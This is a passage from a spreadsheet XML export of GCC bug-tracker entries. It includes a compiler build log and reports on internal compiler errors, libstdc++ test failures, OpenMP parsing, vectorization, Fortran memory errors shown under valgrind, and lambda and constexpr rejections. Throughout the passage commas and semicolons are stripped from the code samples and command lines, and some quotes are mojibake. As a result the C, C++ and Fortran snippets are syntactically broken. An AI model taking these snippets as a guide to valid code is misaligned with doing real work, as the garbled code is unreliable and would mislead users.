D__SIZE_TYPE__=unsigned int -D__PTRDIFF_TYPE__=int -D__WCHAR_TYPE__=long int -
D__WINT_TYPE__=long int -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc 
x.cpp -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -quiet -dumpbase x.cpp -
version -o /var/tmp//cczeWeOb.s
GNU CPP version 3.2 (cpplib) (sparc ELF)
GNU C++ version 3.2 (sparc-sun-solaris2.7)
	compiled by GNU C version 3.2.
ignoring nonexistent directory /cpd/gnu/modules/gcc3.2/sparc-sun-
solaris2.7/include
#include ... search starts here:
#include  search starts here:
 /cpd/gnu/modules/gcc3.2/include/c++/3.2
 /cpd/gnu/modules/gcc3.2/include/c++/3.2/sparc-sun-solaris2.7
 /cpd/gnu/modules/gcc3.2/include/c++/3.2/backward
 /usr/local/include
 /cpd/gnu/modules/gcc3.2/include
 /cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-solaris2.7/3.2/include
 /usr/include
End of search list.
 /cpd/gnu/modules/gcc3.2/bin/as -V -Qy -s -
o /var/tmp//cc92lqXh.o /var/tmp//cczeWeOb.s
GNU assembler version 2.12 (sparc-sun-solaris2.7) using BFD version 2.12
 /cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-solaris2.7/3.2/collect2 -V -Y 
P/usr/ccs/lib:/usr/lib -Qy /cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-
solaris2.7/3.2/crt1.o /cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-
solaris2.7/3.2/crti.o /usr/ccs/lib/values-Xa.o /cpd/gnu/modules/gcc3.2/lib/gcc-
lib/sparc-sun-solaris2.7/3.2/crtbegin.o -L/cpd/gnu/modules/gcc3.2/lib/gcc-
lib/sparc-sun-solaris2.7/3.2 -L/cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-
solaris2.7/3.2/../../../../sparc-sun-solaris2.7/lib -L/usr/ccs/bin -
L/usr/ccs/lib -L/cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-
solaris2.7/3.2/../../.. /var/tmp//cc92lqXh.o -lstdc++ -lgcc -lgcc_eh -lc -lgcc -
lgcc_eh -lc /cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-
solaris2.7/3.2/crtend.o /cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-
solaris2.7/3.2/crtn.o
GNU ld version 2.12
  Supported emulations:
   elf32_sparc
   elf64_sparc
------------------------------cut here------------------------------</t>
  </si>
  <si>
    <t>vince.delvecchio</t>
  </si>
  <si>
    <t>GCC-71081</t>
  </si>
  <si>
    <t>experimental/memory_resource/1.cc run for targets without atomics</t>
  </si>
  <si>
    <t>Hi
experimental/memory_resource/1.cc test in libstdc++ is run for target without atomic support (such as ARMv6-M devices) and thus fail with the following error:
ccAS6AZQ.o: In function `std::__atomic_base::exchange(std::experimental::fundamentals_v2::pmr::memory_resource* std::memory_order)':^M
libstdc++-v3/include/bits/atomic_base.h:730: undefined reference to `__atomic_exchange_4'^M
collect2: error: ld returned 1 exit status^M
compiler exited with status 1
output is:
ccAS6AZQ.o: In function `std::__atomic_base::exchange(std::experimental::fundamentals_v2::pmr::memory_resource* std::memory_order)':^M
libstdc++-v3/include/bits/atomic_base.h:730: undefined reference to `__atomic_exchange_4'^M
collect2: error: ld returned 1 exit status^M
FAIL: experimental/memory_resource/1.cc (test for excess errors)
Excess errors:
libstdc++-v3/include/bits/atomic_base.h:730: undefined reference to `__atomic_exchange_4'
collect2: error: ld returned 1 exit status
UNRESOLVED: experimental/memory_resource/1.cc compilation failed to produce executable
The error seems to come from the experimental/memory_resource file included in that test.
I believe the test should have an additional dg-require-atomic-builtins dejagnu directive.</t>
  </si>
  <si>
    <t>GCC-82472</t>
  </si>
  <si>
    <t>[8 Regression] ICE in generate_code_for_partition at tree-loop-distribution.c:1145</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20171001 snapshot (r253330) ICEs when compiling the following snippet w/ -O3 or -Ofast:
long int xj
int
cx (long int *ox short int mk char tf)
{
  int si f9
  char *p4 = 
  short int *rm = (tf != 0) ? (short int *)
  for (f9 = 0 f9 &lt; 2 ++f9)
    {
      *rm = 0
      *p4 = *ox
      si = mk
      xj = 0
      while (p4 &lt; (char *)rm)
        ++p4
    }
  return si
}
% gcc-8.0.0-alpha20171001 -O3 -c mjliuylm.c
during GIMPLE pass: ldist
mjliuylm.c: In function 'cx':
mjliuylm.c:4:1: internal compiler error: in generate_code_for_partition at tree-loop-distribution.c:1145
 cx (long int *ox short int mk char tf)
 ^~</t>
  </si>
  <si>
    <t>GCC-34506</t>
  </si>
  <si>
    <t>gcc disallows comma between C/C++ OpenMP clauses</t>
  </si>
  <si>
    <t>OpenMP 2.5 in 2.1 has:
#pragma omp directive-name [clause[ [] clause]...] new-line
and for Fortran
sentinel directive-name [clause[[] clause]...]
While for Fortran the optional commas are accepted the C/C++ parser rejects them.
Working on a patch.</t>
  </si>
  <si>
    <t>GCC-4537</t>
  </si>
  <si>
    <t>reverse_iterator has a member called `current' available</t>
  </si>
  <si>
    <t>In stl_iterator reverse_iterator is set up with a member _M_current not intended for use.  However the standard says in $24.4.1.1 that the member `current' is defined to exist.
The attached patch replaces uses of _M_current in reverse_iterator with `current'.
Release:
CVS tree</t>
  </si>
  <si>
    <t>GCC-35117</t>
  </si>
  <si>
    <t>Vectorization on power PC</t>
  </si>
  <si>
    <t>Hello
  I am unable to see the expected performance gain using vectorizatio on powerPC using Linux Suse.
  I've prepared a simple test and compiled it once with vectorization and once without the vectorization flags. I'd appriciate if someone could point me as to what Im doing wrong here.Bellow are the results of the test runs:
   time ./TestNoVec 92200 8 89720 1000
   real    0m23.549s
   time ./TestVec 92200 8 89720 1000
   real    0m22.845s
Here is the code:
#include 
#include 
#include 
typedef float ARRTYPE
int main ( int argc char *argv[] )
{
	int m_nSamples = atoi( argv[1] )
	int itBegin = atoi( argv[2] )
	int itEnd = atoi( argv[3] )
	int iSizeMain = atoi( argv[ 4 ] )
	ARRTYPE *pSum1 = new ARRTYPE[ 100000 ]
	ARRTYPE *pSum = new ARRTYPE[ 100000 ]
	for ( int it = 0 it &lt; m_nSamples it++ )
	{
		pSum[ it ] = it / itBegin
		pSum1[ it ] = itBegin / ( it + 1 )
	}
	ARRTYPE *pVec1 = (ARRTYPE*) malloc (sizeof(ARRTYPE) *m_nSamples)
	ARRTYPE *pVec2 = (ARRTYPE*) malloc (sizeof(ARRTYPE) *m_nSamples)
	for ( int i = 0 j = 0 i &lt; m_nSamples - 5 i++ )
	{
	    for( int it = itBegin it &lt; itEnd it++ )
		pVec1[ it ] += pSum[ it ] + pSum1[ it ]	
        }
	free( pVec1 )
	free( pVec2 )
}
Compilation flag for No vectorization:
gcc  -DTIXML_USE_STL -I /home/build/build -I /home/build/build -I. -I /usr/local/include -I /usr/include -O3 -fomit-frame-pointer -mtune=powerpc -falign-functions=16 -fprefetch-loop-arrays -fpeel-loops -funswitch-loops  -fPIC -mcpu=powerpc  -m64 -fargument-noalias -funroll-loops -ftree-vectorizer-verbose=7 -fdump-tree-vect-details  -c -o Test.o Test.cpp
gcc -lpthread -lz -lm -lstdc++ -DTIXML_USE_STL -I /home/build/build -I /home/build/build -I. -I /usr/local/include -I /usr/include -O3 -fomit-frame-pointer -mtune=powerpc -falign-functions=16 -fprefetch-loop-arrays -fpeel-loops -funswitch-loops  -fPIC -mcpu=powerpc  -m64 -fargument-noalias -funroll-loops -ftree-vectorizer-verbose=7 -fdump-tree-vect-details -L/usr/local/lib64 -DTIXML_USE_STL -pthread -L. -L /home/build/build/lib64 -L /home/build/build/lib64 -L /usr/lib64 -L /lib64 -L /opt/gnome/lib64 -o TestNoVec Test.o
Compilation of vectorized code:
gcc  -DTIXML_USE_STL -I /home/build/build -I /home/build/build -I. -I /usr/local/include -I /usr/include -O3 -fomit-frame-pointer -mtune=powerpc -falign-functions=16 -fprefetch-loop-arrays -fpeel-loops -funswitch-loops -ftree-vectorize -fPIC -mcpu=powerpc -maltivec -mabi=altivec -m64 -fargument-noalias -funroll-loops -ftree-vectorizer-verbose=7 -fdump-tree-vect-details  -c -o Test.o Test.cpp
gcc -lpthread -lz -lm -lstdc++ -DTIXML_USE_STL -I /home/build/build -I /home/build/build -I. -I /usr/local/include -I /usr/include -O3 -fomit-frame-pointer -mtune=powerpc -falign-functions=16 -fprefetch-loop-arrays -fpeel-loops -funswitch-loops -ftree-vectorize -fPIC -mcpu=powerpc -maltivec -mabi=altivec -m64 -fargument-noalias -funroll-loops -ftree-vectorizer-verbose=7 -fdump-tree-vect-details -L/usr/local/lib64 -DTIXML_USE_STL -pthread -L. -L /home/build/build/lib64 -L /home/build/build/lib64 -L /usr/lib64 -L /lib64 -L /opt/gnome/lib64 -o TestVec Test.o</t>
  </si>
  <si>
    <t>GCC-10608</t>
  </si>
  <si>
    <t>default arguments not permitted function typedef</t>
  </si>
  <si>
    <t>------------------- default_args.cc -----------------------
#include 
int func(int val1 int val2 = 0)
{
        return val1 + val2
}
int main()
{
        typedef int (*fptr)(int int = 0)
        fptr fp = func
        std::cout &lt;&lt; fp(42) &lt;&lt; '\n'
        std::cout &lt;&lt; fp(42 1) &lt;&lt; '\n'
}
Release:
unknown
Environment:
GNU/Linux (Red Hat 7.3)
How-To-Repeat:
- With g++ version 3.4 20030502 (experimental) compile as follows:
g++ default-args-func.cc
* This yields the following error diagnostic:
  error: default arguments are only permitted on functions</t>
  </si>
  <si>
    <t>nelsonbe</t>
  </si>
  <si>
    <t>GCC-5730</t>
  </si>
  <si>
    <t>complex::norm() -- huge slowdown from egcs-2.91.66</t>
  </si>
  <si>
    <t>gcc-3.0.3 (or rather libstdc++ 3.0.95) generates code for complex::norm
which might be more accurate but which is a lot slower than 're * re + im * im'.
Context: in the split step Fourier algorithm I need to calcuate
u[j] &lt;- u[j] * exp(cst * |u[i]|^2) (interleaved with FFTs). With the gcc-3.0.3 my program
becomes 40 % slower than egcs-2.91.66. The example below is even twice as slow.
I do not know how much more accurate the 3.0.3 calculation is but certainly for my purposes it
is not worth the 40 % extra running time -- I guess I could override the norm() definition by a
non-templatized one but I'ld rather have the fast definition in the library.
Release:
3.0.3
Environment:
System: Linux sfup03.stratford 2.2.17-mosix #7 SMP Tue Oct 24 14:33:47 BST
2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.3/configure --prefix=/usr/local
How-To-Repeat:
example.cc given below g++ is egcs-2.91.66 (Redhat 6.2)'s g++.
g++  -O3 -mcpu=pentiumpro -DUSE_NORM -o old_norm example.cc
g++-3.0.3 -O3 -mcpu=pentiumpro -DUSE_NORM -o new_norm example.cc  -finline-limit=9999
g++  -O3 -mcpu=pentiumpro -o old_separate example.cc
g++-3.0.3 -O3 -mcpu=pentiumpro -o new_separate example.cc -finline-limit=9999
times:
//              elapsed user    system
// old_norm     1.10    1.10    0.01
// new_norm     2.20    2.19    0.01
// old_separate 1.10    1.10    0.00
// new_separate 1.13    1.13    0.00
// example.cc
#include 
typedef std::complex Complex
int main(int argc char *argv[]) {
  Complex u[2048]
  for (int i = 0 i &lt; 2048 ++i)
    u[i] = 1.0
  for (int i = 0 i &lt; 2000 ++i) {
    Complex * p = u
    for(unsigned int i = 0 i &lt; 2048 ++i) {
#ifdef USE_NORM
      double u2 = norm(*p)
#else
      double ur = real(*p) double ui = imag(*p)
      double u2 = ur * ur + ui * ui
#endif
      double t = u2 * 0.1
      *p *= Complex(cos(t) sin(t))
      ++p
    }
  }
}
// end of example.cc
------------
This e-mail and any attachments are confidential.  If you are not the intended recipient please notify us immediately by reply e-mail and then delete this message from your system. Do not copy this e-mail or any attachments use the contents for any purpose or disclose the contents to any other person: to do so could be a breach of confidence.
Unformatted:
 to 3.0.3</t>
  </si>
  <si>
    <t>jeroen.nijhof</t>
  </si>
  <si>
    <t>GCC-45451</t>
  </si>
  <si>
    <t>[OOP] Inconsistent status of ALLOCATABLE components inside CLASS variables.</t>
  </si>
  <si>
    <t>Hello
After a lot (a LOT) of work I've come up with this test case. The test case *appears* to run fine but valgrind shows something is amiss and in the full application (much more complex) there follow multiple segfaults. I did not find (so far) a way to have a test case both small and exibiting the error out of valgrind hope you'll pardon me. 
The error: the ALLOCATABLE components of the ATX%A variable are detected as ALLOCATED and seemingly are printed OK but VALGRIND says they were already freed.
===============================================================================
[sfilippo@donald bug23]$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gnu46/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/usr/local/gnu46 --enable-languages=cc++fortran
Thread model: posix
gcc version 4.6.0 20100830 (experimental) (GCC) 
[sfilippo@donald bug23]$ gfortran -ggdb  -o bug23 bug23.f03
[sfilippo@donald bug23]$ ./bug23
 New version 
 Allocation status:  T T T
           0           0           4           5
           0           0           2           3           0           0           0           0           0           0           0           0
   0.0000000000000000        1.0000000000000000        2.0000000000000000        3.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000     
[sfilippo@donald bug23]$ valgrind ./bug23
==6940== Memcheck a memory error detector
==6940== Copyright (C) 2002-2009 and GNU GPL'd by Julian Seward et al.
==6940== Using Valgrind-3.5.0 and LibVEX rerun with -h for copyright info
==6940== Command: ./bug23
==6940== 
 New version 
 Allocation status:  T T T
==6940== Invalid read of size 4
==6940==    at 0x4CC19B8: extract_int (write.c:450)
==6940==    by 0x4CC27B1: write_integer (write.c:1260)
==6940==    by 0x4CC5BDE: _gfortrani_list_formatted_write (write.c:1552)
==6940==    by 0x4CBACA7: _gfortran_transfer_array (transfer.c:2000)
==6940==    by 0x401834: MAIN__ (bug23.f03:308)
==6940==    by 0x40197A: main (bug23.f03:284)
==6940==  Address 0x5141450 is 0 bytes inside a block of size 16 free'd
==6940==    at 0x4A04D72: free (vg_replace_malloc.c:325)
==6940==    by 0x4CCB5A8: _gfortran_move_alloc (move_alloc.c:41)
==6940==    by 0x400B90: __psb_d_csr_mat_mod_MOD_psb_d_mv_csr_from_fmt (bug23.f03:238)
==6940==    by 0x401449: __psb_d_mat_mod_MOD_psb_d_mv_from (bug23.f03:277)
==6940==    by 0x4016C6: MAIN__ (bug23.f03:302)
==6940==    by 0x40197A: main (bug23.f03:284)
==6940== 
           1           3           4           5
           1           1           2           3           0           0           0           0           0           0           0           0
==6940== Invalid read of size 8
==6940==    at 0x4CC3795: write_float (write_float.def:1050)
==6940==    by 0x4CC508C: _gfortrani_write_real (write.c:1470)
==6940==    by 0x4CC5BAE: _gfortrani_list_formatted_write (write.c:1561)
==6940==    by 0x4CBACA7: _gfortran_transfer_array (transfer.c:2000)
==6940==    by 0x401904: MAIN__ (bug23.f03:310)
==6940==    by 0x40197A: main (bug23.f03:284)
==6940==  Address 0x5141510 is 0 bytes inside a block of size 96 free'd
==6940==    at 0x4A04D72: free (vg_replace_malloc.c:325)
==6940==    by 0x4CCB5A8: _gfortran_move_alloc (move_alloc.c:41)
==6940==    by 0x400BDC: __psb_d_csr_mat_mod_MOD_psb_d_mv_csr_from_fmt (bug23.f03:240)
==6940==    by 0x401449: __psb_d_mat_mod_MOD_psb_d_mv_from (bug23.f03:277)
==6940==    by 0x4016C6: MAIN__ (bug23.f03:302)
==6940==    by 0x40197A: main (bug23.f03:284)
==6940== 
   1.0000000000000000        1.0000000000000000        2.0000000000000000        3.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000        0.0000000000000000     
==6940== 
==6940== HEAP SUMMARY:
==6940==     in use at exit: 0 bytes in 0 blocks
==6940==   total heap usage: 33 allocs 33 frees 4938 bytes allocated
==6940== 
==6940== All heap blocks were freed -- no leaks are possible
==6940== 
==6940== For counts of detected and suppressed errors rerun with: -v
==6940== ERROR SUMMARY: 28 errors from 2 contexts (suppressed: 6 from 6)</t>
  </si>
  <si>
    <t>GCC-51494</t>
  </si>
  <si>
    <t>Legal program rejection - capturing this when using static method inside lambda</t>
  </si>
  <si>
    <t>Consider the following source code:
struct A
{
    static void f() {}
    void foo()
    {
        [] () { f() }
    }
}
GCC 4.6.1 produces the following error message when compiling it:
test.cpp: In lambda function:
test.cpp:7:27: error: â€˜thisâ€™ was not captured for this lambda function
However the member function f is static and it's call doesn't use 'this' therefore the lambda need not to capture 'this'. The code shall compile.</t>
  </si>
  <si>
    <t>ulidtko</t>
  </si>
  <si>
    <t>GCC-78610</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20161127 snapshot ICEs when compiling the following reduced snippet (copied from PR78342 comment 7) for 32-bit BE powerpc w/ -Os or -O2:
unsigned int ao gl
void
ri (void)
{
  for ()
    {
      if (ao != 1)
        ao /= 0
      gl = 0
    }
}
% powerpc-e300c3-linux-gnu-gcc-7.0.0-alpha20161127 -Os -w -c ygkelvbv.c
ygkelvbv.c: In function 'ri':
ygkelvbv.c:12:1: error: in basic block 4:
 }
 ^
ygkelvbv.c:12:1: error: flow control insn inside a basic block
(insn 48 20 29 4 (trap_if (const_int 1 [0x1])
        (const_int 0 [0])) 823 {trap}
     (nil))
ygkelvbv.c:12:1: internal compiler error: in rtl_verify_bb_insns at cfgrtl.c:2656
0x2bc3f1b85f5 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/rtl-error.c:108
0x2bc3ed7fe87 rtl_verify_bb_insns
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/cfgrtl.c:2656
0x2bc3ed7fe87 rtl_verify_flow_info_1
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/cfgrtl.c:2742
0x2bc3ed7fef4 rtl_verify_flow_info
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/cfgrtl.c:2984
0x2bc3ed6c08d verify_flow_info()
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/cfghooks.c:258
0x2bc3f142ea1 execute_function_todo
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/passes.c:1977
0x2bc3f143ceb execute_todo
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/passes.c:2015
Applying r242947 doesn't fix it.</t>
  </si>
  <si>
    <t>GCC-1838</t>
  </si>
  <si>
    <t>g++ gives an internal compiler error in grokdeclarator</t>
  </si>
  <si>
    <t>I get the following output when compiling the sample code.
bug.C:13: explicit specialization in non-namespace scope `struct 
IDataOutput'
bug.C:14: invalid use of undefined type `struct IDataOutput'
bug.C:6: forward declaration of `struct IDataOutput'
bug.C:14: Internal error #19990331.
bug.C:14: Internal compiler error in grokdeclarator at 
../gcc/cp/decl.c:9815
Please submit a full bug report.
See  for instructions.
Release:
gcc 2.96
Environment:
RedHat Linux 7.0 (i686)
How-To-Repeat:
g++ bug.C</t>
  </si>
  <si>
    <t>pabrabbin</t>
  </si>
  <si>
    <t>GCC-2817</t>
  </si>
  <si>
    <t>g++.abi/vtable2.C not aliasing safe?</t>
  </si>
  <si>
    <t>gcc/testsuite/g++.old-deja/g++.abi/vtable2.C FAILs execution (exit code = 1) on powerpc-linux-gnu if compiled with -O2.
Adding -fno-strict-aliasing fixes it and executing the testcase returns with exit code 0.
Release:
gcc-3.0 20010513 gcc-3.1 20010513
Environment:
powerpc-linux-gnu
binutils-2.11.90.0.7
glibc-2.2.3</t>
  </si>
  <si>
    <t>GCC-31975</t>
  </si>
  <si>
    <t>[4.3 Regression] segfault in try_split on mips during bootstrap</t>
  </si>
  <si>
    <t>I'm getting a bootstrap error on mips with 4.3 SVN 20070515 revision 124745.
The compiler segfaults when compiling libstdc++-v3/src/strstream.cc with:
Program received signal SIGSEGV Segmentation fault.
0x0074701c in try_split (pat= trial=0x2bfb31e0 last=1)
    at ../../src/gcc/emit-rtl.c:3286
3286      for (tem = NEXT_INSN (before) tem != after tem = NEXT_INSN (tem))
(gdb) where
#0  0x0074701c in try_split (pat= trial=0x2bfb31e0 last=1)
    at ../../src/gcc/emit-rtl.c:3286
#1  0x008cbcb8 in split_insn (insn=0x2bfb31e0) at ../../src/gcc/recog.c:2742
#2  0x008cbe78 in split_all_insns_noflow () at ../../src/gcc/recog.c:2888
#3  0x00b6b638 in mips_output_mi_thunk (file=0xece868 thunk_fndecl= delta=0
    vcall_offset=-12 function=0x2bfb4000) at ../../src/gcc/config/mips/mips.c:7275
#4  0x0059bd40 in use_thunk (thunk_fndecl=0x2baa6600 emit_p=)
    at ../../src/gcc/cp/method.c:441
#5  0x005ab854 in expand_body (fn=0x2ba9e700) at ../../src/gcc/cp/semantics.c:3084
#6  0x00b74090 in cgraph_expand_function (node=0x2ba9ea00) at ../../src/gcc/cgraphunit.c:1086
#7  0x00b77d28 in cgraph_optimize () at ../../src/gcc/cgraphunit.c:1155
#8  0x0051990c in cp_write_global_declarations () at ../../src/gcc/cp/decl2.c:3308
#9  0x0095c08c in toplev_main (argc= argv=)
    at ../../src/gcc/toplev.c:1064
#10 0x2abee050 in __libc_start_main () from /lib/libc.so.6
#11 0x0043d9bc in _ftext ()
(gdb)
Command line:
(sid)1846:tbm@bigsur: ..linux-gnu/libstdc++-v3/src] /home/tbm/src/gcc-snapshot-20070515/build/./gcc/xgcc -shared-libgcc -B/home/tbm/src/gcc-snapshot-20070515/build/./gcc -nostdinc++ -L/home/tbm/src/gcc-snapshot-20070515/build/mips-linux-gnu/libstdc++-v3/src -L/home/tbm/src/gcc-snapshot-20070515/build/mips-linux-gnu/libstdc++-v3/src/.libs -B/usr/lib/gcc-snapshot/mips-linux-gnu/bin/ -B/usr/lib/gcc-snapshot/mips-linux-gnu/lib/ -isystem /usr/lib/gcc-snapshot/mips-linux-gnu/include -isystem /usr/lib/gcc-snapshot/mips-linux-gnu/sys-include -I/home/tbm/src/gcc-snapshot-20070515/build/mips-linux-gnu/libstdc++-v3/include/mips-linux-gnu -I/home/tbm/src/gcc-snapshot-20070515/build/mips-linux-gnu/libstdc++-v3/include -I/home/tbm/src/gcc-snapshot-20070515/src/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -g -O2 -D_GNU_SOURCE -I/home/tbm/src/gcc-snapshot-20070515/build/mips-linux-gnu/libstdc++-v3/include/backward -Wno-deprecated -c ../../../../src/libstdc++-v3/src/strstream.cc -o strstream.o
../../../../src/libstdc++-v3/src/strstream.cc: In member function 'void std::strstream::_ZTv0_n12_NSt9strstreamD0Ev()':
../../../../src/libstdc++-v3/src/strstream.cc:418: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-18797</t>
  </si>
  <si>
    <t>[4.0 Regression] Wrong gcc shared library symlink for multilib</t>
  </si>
  <si>
    <t>With gcc 4.0 in CVS on Thu Dec  2 19:57:52 UTC 2004 I got
[hjl@gnu-20 build-x86_64-linux]$ ls -l gcc/32/libgcc_s_32.so
lrwxrwxrwx    1 hjl      hjl            16 Dec  2 12:27 gcc/32/libgcc_s_32.so -&gt;
32/libgcc_s.so.1
[hjl@gnu-20 build-x86_64-linux]$ ls gcc/32/libgcc_s_32.so
ls: gcc/32/libgcc_s_32.so: No such file or directory
on Linux/x86_64.</t>
  </si>
  <si>
    <t>GCC-52179</t>
  </si>
  <si>
    <t>boehm-gc incompatible with aslr on darwin11</t>
  </si>
  <si>
    <t>Currently we see the failures...
FAIL: boehm-gc.c/gctest.c -O2 execution test
FAIL: boehm-gc.c/leak_test.c -O2 execution test
FAIL: boehm-gc.c/thread_leak_test.c -O2 execution test
FAIL: boehm-gc.lib/staticrootstest.c -O2 execution test
at -m32/-m64 on x86_64-apple-darwin11. Interestingly if boehm-gc/testsuite/lib/boehm-gc.exp is adjusted pass -Wl-pie to these tests the failures are not seen under aslr on x86_64-apple-darwin10. This is the same behavior seen for PR52042 which suggests that the issue and fix may be similar.
Perhaps the same approach used in could be applied to boehm-gc/dyn_load.c.</t>
  </si>
  <si>
    <t>GCC-82570</t>
  </si>
  <si>
    <t>Lambda fails to compile because it doesn't meet constexpr requirements</t>
  </si>
  <si>
    <t>Created attachment 42380
A testcase that shows the problem.
The attached program fails to compile with the following command line:
g++-7 -std=gnu++1z -o test_constexpr_lambda test_constexpr_lambda.cpp
test_constexpr_lambda.cpp: In instantiation of â€˜foo(Pred):: [with Pred = main()::]â€™:
test_constexpr_lambda.cpp:12:7:   required from â€˜struct foo(Pred) [with Pred = main()::]::â€™
test_constexpr_lambda.cpp:10:9:   required from â€˜void foo(Pred) [with Pred = main()::]â€™
test_constexpr_lambda.cpp:25:33:   required from here
test_constexpr_lambda.cpp:14:18: error: uninitialized variable â€˜bufâ€™ in â€˜constexprâ€™ function
    unsigned char buf[4]
                  ^~~
test_constexpr_lambda.cpp:2:13: error: â€˜void iterate(Body) [with Body = foo(Pred) [with Pred = main()::]::]â€™ declared using local type â€˜foo(Pred) [with Pred = main()::]::â€™ is used but never defined [-fpermissive]
 inline void iterate(Body body)
             ^~~~~~~
test_constexpr_lambda.cpp:2:13: warning: â€˜void iterate(Body) [with Body = foo(Pred) [with Pred = main()::]::]â€™ used but never defined
The program compiles with -std=gnu++14. It also compiles successfully with gcc 6.3.0 and -std=gnu++1z (i.e. this is a regression since gcc 6).
I believe this is a compiler bug because (a) neither the lambda nor the calling code are marked constexpr and (b) according to [expr.prim.lambda.closure]/4 the lambda should only be considered constexpr if it meets constexpr requirements (otherwise it should be compiled as a regular runtime function).
g++-7 -v
Using built-in specs.
COLLECT_GCC=g++-7
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper
OFFLOAD_TARGET_NAMES=nvptx-none
OFFLOAD_TARGET_DEFAULT=1
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 7.2.0-1mind1' --with-bugurl=file:///usr/share/doc/gcc-7/README.Bugs --enable-languages=cadac++gobrigdfortranobjcobj-c++ --prefix=/usr --with-gcc-major-version-only --program-suffix=-7 --program-prefix=x86_64-linux-gnu- --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --enable-default-pie --with-system-zlib --with-target-system-zlib --enable-objc-gc=auto --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-offload-targets=nvptx-none --without-cuda-driver --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 7.2.0 (Ubuntu 7.2.0-1mind1)</t>
  </si>
  <si>
    <t>andysem</t>
  </si>
  <si>
    <t>GCC-1814</t>
  </si>
  <si>
    <t>fr30-elf 2.97 cross-compiler segmentation faults on FreeBSD 4.2-stable building libgcc</t>
  </si>
  <si>
    <t>xgcc seg. faults compiling libgcc2.c at line 747.
gmake[1]: Entering directory `/usr/home/da/fr30/gcc/gcc'
for d in libgcc do \
  if [ -d $d ] then true else mkdir $d fi \
done
if [ -f stmp-dirs ] then true else touch stmp-dirs fi
./xgcc -B./ -B/usr/home/da/fr30-gcc/fr30-elf/bin/ -isystem /usr/home/da/fr30-gcc/fr30-elf/include -O2  -DCROSS_COMPILE -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include   -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I. -I. -I./. -I./config -I./../include  -DL_divdi3 -c ./libgcc2.c -o libgcc/./_divdi3.o
./libgcc2.c: In function `__divdi3':
./libgcc2.c:747: Internal error: Segmentation fault.
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
gmake[1]: *** [libgcc/./_divdi3.o] Error 1
gmake[1]: Leaving directory `/usr/home/da/fr30/gcc/gcc'
gmake: *** [libgcc.a] Error 2
Release:
gcc version 2.97 20010130 (experimental)
Environment:
FreeBSD 4.2-stable
How-To-Repeat:
Configure gcc version 2.97 20010130 (experimental) thusly:
./configure --prefix=/usr/home/da/fr30-gcc --target=fr30-elf
chdir to the gcc subdirectory:
cd gcc
GNU make a cross-compiler: 
gmake LANGUAGES=c
N.B.  GNU make is named gmake on my system.  This differentiates it from my systemic make.</t>
  </si>
  <si>
    <t>dakott</t>
  </si>
  <si>
    <t>GCC-6135</t>
  </si>
  <si>
    <t>How to unsubscribe from the list</t>
  </si>
  <si>
    <t xml:space="preserve">  Hi
 How to unsubscribe from the list
 regards 
 Puneet
 ________________________________________________________________________
 For live cricket scores download  Yahoo! Score Tracker
  at: http://in.sports.yahoo.com/cricket/tracker.html
Release:
unknown</t>
  </si>
  <si>
    <t>puneet762k1</t>
  </si>
